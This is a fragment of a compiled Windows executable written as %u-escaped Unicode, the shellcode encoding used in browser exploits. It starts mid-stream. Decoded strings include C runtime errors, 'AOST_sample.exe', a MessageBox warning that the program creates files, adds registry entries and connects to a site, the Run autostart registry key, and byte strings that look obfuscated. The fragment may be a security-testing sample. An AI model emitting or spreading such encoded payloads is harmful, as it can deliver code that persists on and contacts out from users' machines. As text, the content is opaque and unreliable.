277%uc602%ue03a%u0b75%ue983%u7501%u33d1%u3ac9%u74e0%ub909%uffff%uffff%u0272%ud9f7%uc18b%u5e5b%uc95f%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%u8b56%u2444%u0b14%u75c0%u8b28%u244c%u8b10%u2444%u330c%uf7d2%u8bf1%u8bd8%u2444%uf708%u8bf1%u8bf0%uf7c3%u2464%u8b10%u8bc8%uf7c6%u2464%u0310%uebd1%u8b47%u8bc8%u245c%u8b10%u2454%u8b0c%u2444%ud108%ud1e9%ud1db%ud1ea%u0bd8%u75c9%uf7f4%u8bf3%uf7f0%u2464%u8b14%u8bc8%u2444%uf710%u03e6%u72d1%u3b0e%u2454%u770c%u7208%u3b0f%u2444%u7608%u4e09%u442b%u1024%u541b%u1424%udb33%u442b%u0824%u541b%u0c24%udaf7%ud8f7%uda83%u8b00%u8bca%u8bd3%u8bd9%u8bc8%u5ec6%u10c2%u8b00%u55ff%uec8b%uec83%u5318%u75ff%u8d10%ue84d%u56e8%uff9f%u8bff%u085d%u438d%u3d01%u0100%u0000%u0f77%u458b%u8be8%uc880%u0000%u0f00%u04b7%ueb58%u8975%u085d%u7dc1%u0808%u458d%u50e8%u458b%u2508%u00ff%u0000%ue850%uf407%uffff%u5959%uc085%u1274%u458a%u6a08%u8802%uf845%u5d88%uc6f9%ufa45%u5900%u0aeb%uc933%u5d88%uc6f8%uf945%u4100%u458b%u6ae8%uff01%u1470%u70ff%u8d04%ufc45%u5150%u458d%u50f8%u458d%u6ae8%u5001%ucfe8%uffcb%u83ff%u20c4%uc085%u1075%u4538%u74f4%u8b07%uf045%u6083%ufd70%uc033%u14eb%ub70f%ufc45%u4523%u800c%uf47d%u7400%u8b07%uf04d%u6183%ufd70%uc95b%uccc3%ucccc%u448b%u0824%u4c8b%u1024%uc80b%u4c8b%u0c24%u0975%u448b%u0424%ue1f7%u10c2%u5300%ue1f7%ud88b%u448b%u0824%u64f7%u1424%ud803%u448b%u0824%ue1f7%ud303%uc25b%u0010%u25ff%u8054%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u9aae%u0000%u9a9e%u0000%u9a8c%u0000%u9ac0%u0000%u0000%u0000%u99d2%u0000%u99e4%u0000%u99f4%u0000%u9a06%u0000%u9a16%u0000%u99c4%u0000%u9a3c%u0000%u9a50%u0000%u9a60%u0000%u9a70%u0000%u99bc%u0000%u99a4%u0000%u9996%u0000%u9a2c%u0000%u9988%u0000%u9e8a%u0000%u9e7e%u0000%u9e70%u0000%u9e60%u0000%u9e54%u0000%u9e2c%u0000%u9ae8%u0000%u9afa%u0000%u9b0e%u0000%u9b22%u0000%u9b3e%u0000%u9b5c%u0000%u9b68%u0000%u9b80%u0000%u9b98%u0000%u9ba2%u0000%u9bae%u0000%u9bc0%u0000%u9bd4%u0000%u9be2%u0000%u9bee%u0000%u9bfc%u0000%u9c06%u0000%u9c16%u0000%u9c2c%u0000%u9c38%u0000%u9c48%u0000%u9c62%u0000%u9c7a%u0000%u9c94%u0000%u9caa%u0000%u9cc4%u0000%u9cd6%u0000%u9ce4%u0000%u9cf6%u0000%u9d0e%u0000%u9d1c%u0000%u9d2a%u0000%u9d36%u0000%u9d50%u0000%u9d60%u0000%u9d76%u0000%u9d90%u0000%u9da0%u0000%u9db6%u0000%u9dc6%u0000%u9dd8%u0000%u9dea%u0000%u9e02%u0000%u9e1a%u0000%u0000%u0000%u0039%u8000%u0004%u8000%u000c%u8000%u0073%u8000%u0009%u8000%u0074%u8000%u0010%u8000%u0017%u8000%u0003%u8000%u0034%u8000%u0013%u8000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u29b3%u0040%u55d4%u0040%u6b79%u0040%u336a%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0201%u0403%u0605%u0807%u0a09%u0c0b%u0e0d%u100f%u1211%u1413%u1615%u1817%u1a19%u1c1b%u1e1d%u201f%u2221%u2423%u2625%u2827%u2a29%u2c2b%u2e2d%u302f%u3231%u3433%u3635%u3837%u3a39%u3c3b%u3e3d%u403f%u4241%u4443%u4645%u4847%u4a49%u4c4b%u4e4d%u504f%u5251%u5453%u5655%u5857%u5a59%u5c5b%u5e5d%u605f%u6261%u6463%u6665%u6867%u6a69%u6c6b%u6e6d%u706f%u7271%u7473%u7675%u7877%u7a79%u7c7b%u7e7d%u007f%u6e45%u6f63%u6564%u6f50%u6e69%u6574%u0072%u0000%u004b%u0045%u0052%u004e%u0045%u004c%u0033%u0032%u002e%u0044%u004c%u004c%u0000%u0000%u6544%u6f63%u6564%u6f50%u6e69%u6574%u0072%u0000%u6c46%u4673%u6572%u0065%u6c46%u5373%u7465%u6156%u756c%u0065%u6c46%u4773%u7465%u6156%u756c%u0065%u6c46%u4173%u6c6c%u636f%u0000%u0000%u6f43%u4572%u6978%u5074%u6f72%u6563%u7373%u0000%u006d%u0073%u0063%u006f%u0072%u0065%u0065%u002e%u0064%u006c%u006c%u0000%u7572%u746e%u6d69%u2065%u7265%u6f72%u2072%u0000%u0a0d%u0000%u4c54%u534f%u2053%u7265%u6f72%u0d72%u000a%u0000%u4953%u474e%u6520%u7272%u726f%u0a0d%u0000%u0000%u4f44%u414d%u4e49%u6520%u7272%u726f%u0a0d%u0000%u0000%u0000%u3652%u3330%u0d34%u410a%u206e%u7061%u6c70%u6369%u7461%u6f69%u206e%u6168%u2073%u616d%u6564%u6120%u206e%u7461%u6574%u706d%u2074%u6f74%u6c20%u616f%u2064%u6874%u2065%u2043%u7572%u746e%u6d69%u2065%u696c%u7262%u7261%u2079%u6e69%u6f63%u7272%u6365%u6c74%u2e79%u500a%u656c%u7361%u2065%u6f63%u746e%u6361%u2074%u6874%u2065%u7061%u6c70%u6369%u7461%u6f69%u276e%u2073%u7573%u7070%u726f%u2074%u6574%u6d61%u6620%u726f%u6d20%u726f%u2065%u6e69%u6f66%u6d72%u7461%u6f69%u2e6e%u0a0d%u0000%u0000%u0000%u3652%u3330%u0d33%u2d0a%u4120%u7474%u6d65%u7470%u7420%u206f%u7375%u2065%u534d%u4c49%u6320%u646f%u2065%u7266%u6d6f%u7420%u6968%u2073%u7361%u6573%u626d%u796c%u6420%u7275%u6e69%u2067%u616e%u6974%u6576%u6320%u646f%u2065%u6e69%u7469%u6169%u696c%u617a%u6974%u6e6f%u540a%u6968%u2073%u6e69%u6964%u6163%u6574%u2073%u2061%u7562%u2067%u6e69%u7920%u756f%u2072%u7061%u6c70%u6369%u7461%u6f69%u2e6e%u4920%u2074%u7369%u6d20%u736f%u2074%u696c%u656b%u796c%u7420%u6568%u7220%u7365%u6c75%u2074%u666f%u6320%u6c61%u696c%u676e%u6120%u206e%u534d%u4c49%u632d%u6d6f%u6970%u656c%u2064%u2f28%u6c63%u2972%u6620%u6e75%u7463%u6f69%u206e%u7266%u6d6f%u6120%u6e20%u7461%u7669%u2065%u6f63%u736e%u7274%u6375%u6f74%u2072%u726f%u6620%u6f72%u206d%u6c44%u4d6c%u6961%u2e6e%u0a0d%u0000%u3652%u3330%u0d32%u2d0a%u6e20%u746f%u6520%u6f6e%u6775%u2068%u7073%u6361%u2065%u6f66%u2072%u6f6c%u6163%u656c%u6920%u666e%u726f%u616d%u6974%u6e6f%u0a0d%u0000%u0000%u0000%u3652%u3330%u0d31%u2d0a%u4120%u7474%u6d65%u7470%u7420%u206f%u6e69%u7469%u6169%u696c%u657a%u7420%u6568%u4320%u5452%u6d20%u726f%u2065%u6874%u6e61%u6f20%u636e%u2e65%u540a%u6968%u2073%u6e69%u6964%u6163%u6574%u2073%u2061%u7562%u2067%u6e69%u7920%u756f%u2072%u7061%u6c70%u6369%u7461%u6f69%u2e6e%u0a0d%u0000%u3652%u3330%u0d30%u2d0a%u4320%u5452%u6e20%u746f%u6920%u696e%u6974%u6c61%u7a69%u6465%u0a0d%u0000%u3652%u3230%u0d38%u2d0a%u7520%u616e%u6c62%u2065%u6f74%u6920%u696e%u6974%u6c61%u7a69%u2065%u6568%u7061%u0a0d%u0000%u0000%u3652%u3230%u0d37%u2d0a%u6e20%u746f%u6520%u6f6e%u6775%u2068%u7073%u6361%u2065%u6f66%u2072%u6f6c%u6977%u206f%u6e69%u7469%u6169%u696c%u617a%u6974%u6e6f%u0a0d%u0000%u0000%u3652%u3230%u0d36%u2d0a%u6e20%u746f%u6520%u6f6e%u6775%u2068%u7073%u6361%u2065%u6f66%u2072%u7473%u6964%u206f%u6e69%u7469%u6169%u696c%u617a%u6974%u6e6f%u0a0d%u0000%u0000%u3652%u3230%u0d35%u2d0a%u7020%u7275%u2065%u6976%u7472%u6175%u206c%u7566%u636e%u6974%u6e6f%u6320%u6c61%u0d6c%u000a%u0000%u3652%u3230%u0d34%u2d0a%u6e20%u746f%u6520%u6f6e%u6775%u2068%u7073%u6361%u2065%u6f66%u2072%u6f5f%u656e%u6978%u2f74%u7461%u7865%u7469%u7420%u6261%u656c%u0a0d%u0000%u0000%u3652%u3130%u0d39%u2d0a%u7520%u616e%u6c62%u2065%u6f74%u6f20%u6570%u206e%u6f63%u736e%u6c6f%u2065%u6564%u6976%u6563%u0a0d%u0000%u0000%u3652%u3130%u0d38%u2d0a%u7520%u656e%u7078%u6365%u6574%u2064%u6568%u7061%u6520%u7272%u726f%u0a0d%u0000%u0000%u3652%u3130%u0d37%u2d0a%u7520%u656e%u7078%u6365%u6574%u2064%u756d%u746c%u7469%u7268%u6165%u2064%u6f6c%u6b63%u6520%u7272%u726f%u0a0d%u0000%u0000%u3652%u3130%u0d36%u2d0a%u6e20%u746f%u6520%u6f6e%u6775%u2068%u7073%u6361%u2065%u6f66%u2072%u6874%u6572%u6461%u6420%u7461%u0d61%u000a%u0a0d%u6854%u7369%u6120%u7070%u696c%u6163%u6974%u6e6f%u6820%u7361%u7220%u7165%u6575%u7473%u6465%u7420%u6568%u5220%u6e75%u6974%u656d%u7420%u206f%u6574%u6d72%u6e69%u7461%u2065%u7469%u6920%u206e%u6e61%u7520%u756e%u7573%u6c61%u7720%u7961%u0a2e%u6c50%u6165%u6573%u6320%u6e6f%u6174%u7463%u7420%u6568%u6120%u7070%u696c%u6163%u6974%u6e6f%u7327%u7320%u7075%u6f70%u7472%u7420%u6165%u206d%u6f66%u2072%u6f6d%u6572%u6920%u666e%u726f%u616d%u6974%u6e6f%u0d2e%u000a%u0000%u3652%u3030%u0d39%u2d0a%u6e20%u746f%u6520%u6f6e%u6775%u2068%u7073%u6361%u2065%u6f66%u2072%u6e65%u6976%u6f72%u6d6e%u6e65%u0d74%u000a%u3652%u3030%u0d38%u2d0a%u6e20%u746f%u6520%u6f6e%u6775%u2068%u7073%u6361%u2065%u6f66%u2072%u7261%u7567%u656d%u746e%u0d73%u000a%u0000%u3652%u3030%u0d32%u2d0a%u6620%u6f6c%u7461%u6e69%u2067%u6f70%u6e69%u2074%u7573%u7070%u726f%u2074%u6f6e%u2074%u6f6c%u6461%u6465%u0a0d%u0000%u0000%u694d%u7263%u736f%u666f%u2074%u6956%u7573%u6c61%u4320%u2b2b%u5220%u6e75%u6974%u656d%u4c20%u6269%u6172%u7972%u0000%u0000%u0a0a%u0000%u2e2e%u002e%u703c%u6f72%u7267%u6d61%u6e20%u6d61%u2065%u6e75%u6e6b%u776f%u3e6e%u0000%u7552%u746e%u6d69%u2065%u7245%u6f72%u2172%u0a0a%u7250%u676f%u6172%u3a6d%u0020%u0000%u0000%u0000%u0005%uc000%u000b%u0000%u0000%u0000%u001d%uc000%u0004%u0000%u0000%u0000%u0096%uc000%u0004%u0000%u0000%u0000%u008d%uc000%u0008%u0000%u0000%u0000%u008e%uc000%u0008%u0000%u0000%u0000%u008f%uc000%u0008%u0000%u0000%u0000%u0090%uc000%u0008%u0000%u0000%u0000%u0091%uc000%u0008%u0000%u0000%u0000%u0092%uc000%u0008%u0000%u0000%u0000%u0093%uc000%u0008%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0028%u0028%u0028%u0028%u0028%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0048%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0084%u0084%u0084%u0084%u0084%u0084%u0084%u0084%u0084%u0084%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0081%u0081%u0081%u0081%u0081%u0081%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0001%u0010%u0010%u0010%u0010%u0010%u0010%u0082%u0082%u0082%u0082%u0082%u0082%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0002%u0010%u0010%u0010%u0010%u0020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0068%u0028%u0028%u0028%u0028%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0048%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0084%u0084%u0084%u0084%u0084%u0084%u0084%u0084%u0084%u0084%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0181%u0181%u0181%u0181%u0181%u0181%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0010%u0010%u0010%u0010%u0010%u0010%u0182%u0182%u0182%u0182%u0182%u0182%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0010%u0010%u0010%u0010%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0020%u0048%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0010%u0014%u0014%u0010%u0010%u0010%u0010%u0010%u0014%u0010%u0010%u0010%u0010%u0010%u0010%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0010%u0101%u0101%u0101%u0101%u0101%u0101%u0101%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0010%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0102%u0101%u0000%u0000%u8180%u8382%u8584%u8786%u8988%u8b8a%u8d8c%u8f8e%u9190%u9392%u9594%u9796%u9998%u9b9a%u9d9c%u9f9e%ua1a0%ua3a2%ua5a4%ua7a6%ua9a8%uabaa%uadac%uafae%ub1b0%ub3b2%ub5b4%ub7b6%ub9b8%ubbba%ubdbc%ubfbe%uc1c0%uc3c2%uc5c4%uc7c6%uc9c8%ucbca%ucdcc%ucfce%ud1d0%ud3d2%ud5d4%ud7d6%ud9d8%udbda%udddc%udfde%ue1e0%ue3e2%ue5e4%ue7e6%ue9e8%uebea%uedec%uefee%uf1f0%uf3f2%uf5f4%uf7f6%uf9f8%ufbfa%ufdfc%ufffe%u0100%u0302%u0504%u0706%u0908%u0b0a%u0d0c%u0f0e%u1110%u1312%u1514%u1716%u1918%u1b1a%u1d1c%u1f1e%u2120%u2322%u2524%u2726%u2928%u2b2a%u2d2c%u2f2e%u3130%u3332%u3534%u3736%u3938%u3b3a%u3d3c%u3f3e%u6140%u6362%u6564%u6766%u6968%u6b6a%u6d6c%u6f6e%u7170%u7372%u7574%u7776%u7978%u5b7a%u5d5c%u5f5e%u6160%u6362%u6564%u6766%u6968%u6b6a%u6d6c%u6f6e%u7170%u7372%u7574%u7776%u7978%u7b7a%u7d7c%u7f7e%u8180%u8382%u8584%u8786%u8988%u8b8a%u8d8c%u8f8e%u9190%u9392%u9594%u9796%u9998%u9b9a%u9d9c%u9f9e%ua1a0%ua3a2%ua5a4%ua7a6%ua9a8%uabaa%uadac%uafae%ub1b0%ub3b2%ub5b4%ub7b6%ub9b8%ubbba%ubdbc%ubfbe%uc1c0%uc3c2%uc5c4%uc7c6%uc9c8%ucbca%ucdcc%ucfce%ud1d0%ud3d2%ud5d4%ud7d6%ud9d8%udbda%udddc%udfde%ue1e0%ue3e2%ue5e4%ue7e6%ue9e8%uebea%uedec%uefee%uf1f0%uf3f2%uf5f4%uf7f6%uf9f8%ufbfa%ufdfc%ufffe%u8180%u8382%u8584%u8786%u8988%u8b8a%u8d8c%u8f8e%u9190%u9392%u9594%u9796%u9998%u9b9a%u9d9c%u9f9e%ua1a0%ua3a2%ua5a4%ua7a6%ua9a8%uabaa%uadac%uafae%ub1b0%ub3b2%ub5b4%ub7b6%ub9b8%ubbba%ubdbc%ubfbe%uc1c0%uc3c2%uc5c4%uc7c6%uc9c8%ucbca%ucdcc%ucfce%ud1d0%ud3d2%ud5d4%ud7d6%ud9d8%udbda%udddc%udfde%ue1e0%ue3e2%ue5e4%ue7e6%ue9e8%uebea%uedec%uefee%uf1f0%uf3f2%uf5f4%uf7f6%uf9f8%ufbfa%ufdfc%ufffe%u0100%u0302%u0504%u0706%u0908%u0b0a%u0d0c%u0f0e%u1110%u1312%u1514%u1716%u1918%u1b1a%u1d1c%u1f1e%u2120%u2322%u2524%u2726%u2928%u2b2a%u2d2c%u2f2e%u3130%u3332%u3534%u3736%u3938%u3b3a%u3d3c%u3f3e%u4140%u4342%u4544%u4746%u4948%u4b4a%u4d4c%u4f4e%u5150%u5352%u5554%u5756%u5958%u5b5a%u5d5c%u5f5e%u4160%u4342%u4544%u4746%u4948%u4b4a%u4d4c%u4f4e%u5150%u5352%u5554%u5756%u5958%u7b5a%u7d7c%u7f7e%u8180%u8382%u8584%u8786%u8988%u8b8a%u8d8c%u8f8e%u9190%u9392%u9594%u9796%u9998%u9b9a%u9d9c%u9f9e%ua1a0%ua3a2%ua5a4%ua7a6%ua9a8%uabaa%uadac%uafae%ub1b0%ub3b2%ub5b4%ub7b6%ub9b8%ubbba%ubdbc%ubfbe%uc1c0%uc3c2%uc5c4%uc7c6%uc9c8%ucbca%ucdcc%ucfce%ud1d0%ud3d2%ud5d4%ud7d6%ud9d8%udbda%udddc%udfde%ue1e0%ue3e2%ue5e4%ue7e6%ue9e8%uebea%uedec%uefee%uf1f0%uf3f2%uf5f4%uf7f6%uf9f8%ufbfa%ufdfc%ufffe%u4848%u6d3a%u3a6d%u7373%u0000%u0000%u6464%u6464%u202c%u4d4d%u4d4d%u6420%u2c64%u7920%u7979%u0079%u4d4d%u642f%u2f64%u7979%u0000%u0000%u4d50%u0000%u4d41%u0000%u6544%u6563%u626d%u7265%u0000%u0000%u6f4e%u6576%u626d%u7265%u0000%u0000%u634f%u6f74%u6562%u0072%u6553%u7470%u6d65%u6562%u0072%u0000%u7541%u7567%u7473%u0000%u754a%u796c%u0000%u0000%u754a%u656e%u0000%u0000%u7041%u6972%u006c%u0000%u614d%u6372%u0068%u0000%u6546%u7262%u6175%u7972%u0000%u0000%u614a%u756e%u7261%u0079%u6544%u0063%u6f4e%u0076%u634f%u0074%u6553%u0070%u7541%u0067%u754a%u006c%u754a%u006e%u614d%u0079%u7041%u0072%u614d%u0072%u6546%u0062%u614a%u006e%u6153%u7574%u6472%u7961%u0000%u0000%u7246%u6469%u7961%u0000%u6854%u7275%u6473%u7961%u0000%u0000%u6557%u6e64%u7365%u6164%u0079%u0000%u7554%u7365%u6164%u0079%u6f4d%u646e%u7961%u0000%u7553%u646e%u7961%u0000%u6153%u0074%u7246%u0069%u6854%u0075%u6557%u0064%u7554%u0065%u6f4d%u006e%u7553%u006e%u6547%u5074%u6f72%u6563%u7373%u6957%u646e%u776f%u7453%u7461%u6f69%u006e%u6547%u5574%u6573%u4f72%u6a62%u6365%u4974%u666e%u726f%u616d%u6974%u6e6f%u0041%u0000%u6547%u4c74%u7361%u4174%u7463%u7669%u5065%u706f%u7075%u0000%u6547%u4174%u7463%u7669%u5765%u6e69%u6f64%u0077%u654d%u7373%u6761%u4265%u786f%u0041%u5355%u5245%u3233%u442e%u4c4c%u0000%ub2c8%u0040%ub320%u0040%u7553%u4d6e%u6e6f%u7554%u5765%u6465%u6854%u4675%u6972%u6153%u0074%u0000%u614a%u466e%u6265%u614d%u4172%u7270%u614d%u4a79%u6e75%u754a%u416c%u6775%u6553%u4f70%u7463%u6f4e%u4476%u6365%u0000%u0000%u0000%u0000%u4f41%u5354%u0000%u0000%u005c%u0000%u4f41%u5354%u735f%u6d61%u6c70%u2e65%u7865%u0065%u7375%u7265%u3233%u642e%u6c6c%u0000%u654d%u7373%u6761%u4265%u786f%u0041%u4f41%u5354%u0000%u0000%u0000%u0000%u6854%u7369%u7020%u6f72%u7267%u6d61%u7420%u7972%u7420%u206f%u6f6d%u6964%u7966%u6320%u7275%u6572%u746e%u7320%u7465%u6974%u676e%u2073%u6e69%u7920%u756f%u2072%u6f63%u706d%u7475%u7265%u6528%u672e%u202e%u7263%u6165%u6574%u6620%u6c69%u7365%u6120%u646e%u6f2f%u2072%u6461%u2064%u6572%u6967%u7473%u7972%u6520%u746e%u7972%u6120%u646e%u7320%u206f%u6e6f%u292e%u6120%u646e%u6320%u6e6f%u656e%u7463%u7420%u206f%u6874%u2065%u6973%u6574%u0a2e%u200a%u6f44%u7920%u756f%u7220%u6165%u6c6c%u2079%u6177%u746e%u7420%u206f%u7865%u6365%u7475%u2065%u6874%u7369%u7020%u6f72%u7267%u6d61%u6e20%u776f%u003f%u4f53%u5446%u4157%u4552%u4d5c%u6369%u6f72%u6f73%u7466%u575c%u6e69%u6f64%u7377%u435c%u7275%u6572%u746e%u6556%u7372%u6f69%u5c6e%u7552%u006e%u0000%u4f41%u5354%u0000%u0000%ud1d1%u88d1%ud6cc%uc3c5%ud2d4%uc988%u88d4%ud6cc%u0000%u0000%ue3e1%u86f2%u8689%uf2ee%uf6f2%u9789%u9688%uacab%uacab%u0000%uc9e5%uedcb%udfc3%u869c%u0000%u0000%u3a4f%u0020%u5245%u4f52%u0052%u0000%u6957%u586e%u0050%u0000%u6957%u326e%u336b%u0000%u6e55%u6e6b%u776f%u006e%u6957%u566e%u7369%u6174%u0000%u0000%u6957%u376e%u0000%u0000%u6e55%u6e6b%u776f%u006e%u654c%u6167%u7963%u0000%u3a4e%u0020%u3a44%u0020%u474e%u0000%u4f53%u5446%u4157%u4552%u4d5c%u6369%u6f72%u6f73%u7466%u575c%u6e69%u6f64%u7377%u435c%u7275%u6572%u746e%u6556%u7372%u6f69%u5c6e%u7552%u006e%u0000%u474e%u0000%u4f41%u5354%u0000%u0000%u474e%u0000%u474e%u0000%u474e%u0000%u4b4f%u0000%ue3e1%u86f2%u8689%uf2ee%uf6f2%u9789%u9688%uacab%u0000%u0000%u0a0d%u0a0d%u0000%u0000%u0048%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ua8b4%u0040%u9540%u0040%u0003%u0000%u0000%u0000%u0000%u0000%u4190%u0000%u6818%u0000%u7908%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufffe%uffff%u0000%u0000%uffcc%uffff%u0000%u0000%ufffe%uffff%u2021%u0040%u2035%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u25ac%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffcc%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u297a%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u2cea%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u2f2c%u0040%ufffe%uffff%u0000%u0000%u2f3b%u0040%ufffe%uffff%u0000%u0000%uffd8%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u30ee%u0040%ufffe%uffff%u0000%u0000%u30fa%u0040%ufffe%uffff%u0000%u0000%uffc8%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u3600%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uff8c%uffff%u0000%u0000%ufffe%uffff%u409c%u0040%u40a0%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u4bc3%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u4c55%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd8%uffff%u0000%u0000%ufffe%uffff%u54f0%u0040%u54f4%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u563b%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd8%uffff%u0000%u0000%ufffe%uffff%u579b%u0040%u57af%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffc0%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u599d%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd0%uffff%u0000%u0000%ufffe%uffff%u5a2d%u0040%u5a44%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u6ae4%u0040%u6b00%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u6dc9%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u6fc3%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd0%uffff%u0000%u0000